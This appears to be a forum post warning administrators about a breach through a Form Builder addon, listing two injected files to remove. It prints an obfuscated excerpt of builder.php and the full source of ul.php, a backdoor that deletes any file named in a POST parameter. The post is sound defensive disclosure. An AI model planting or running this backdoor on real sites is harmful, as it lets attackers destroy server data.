A client site has recently been hacked. Client is running version 2.0.11. Found client was hacked through the Form Builder addon. There are 2 additional files that have been injected into the addons/form_builder directory.
What to look for:
builder.php - This file contained roughly 4,500 lines of encrypted function code. This code looked like this:
```php
{
for($pa5=159;$pa5<7367;$pa5--){if($pa5!=17877) break;}
}
function b4ebd1a37d330fc77f229e42d57171a8c012769()
{
for($pa5=11;$pa5<12019;$pa5-=1){if($pa5!=30749) break;}
}
function b4ebd620c393876e21cecd4871c9d872eb0c0d60b()
{
for($pa5=139;$pa5<7803;$pa5--){if($pa5!=12933) break;}
}
function b4ebd4b77176337f5777f66468795f68071daebbe9ff7f7ba8d0dd2()
{
for($pa5=55;$pa5<26731;$pa5-=243){if($pa5!=1749) break;}
}
function b4ebd68349246a3d168342a39f378dc9d3951c4dacc1ad4eff77f7d7()
{
for($pa5=141;$pa5<7483;$pa5-=1){if($pa5!=23333) break;}
}
function b4ebd8ffd163e7f1e6f0f1c35f7b0f9cc6b0b9e9361e3c7af070()
{
}
function b4ebde83cb25a774bfdc00()
{
}
function b4ebdf4204fe69eff9034c18b84367eec75da71f7bc11472()
{
}
function b4ebdec3dcf77a377ced4d672e791db75fe702e213f0ee7ae()
{
```
The second file found was [b]ul.php[/b]. This file had the following code:
```php
if (isset($_POST['link'])) {
$app_dir = get_app_root_dir();
@unlink($app_dir . $_POST['link']);
if (file_exists($app_dir . $_POST['link']))
echo "Failed!";
else
echo "Unlinked!";
}
//
function get_app_root_dir($max_deep = 30)
{
for($i=1; $i<=$max_deep; $i++)
{
$dir = getcwd();
if( file_exists($dir . "/config.local.php") )
return $dir.'/';
chdir('../');
}
return false;
}
```
I recommend everyone check this addon for these files and remove the files immediately. I found this by combing through all recent traffic and found POST calls to the builder.php file coming from eastern block countries.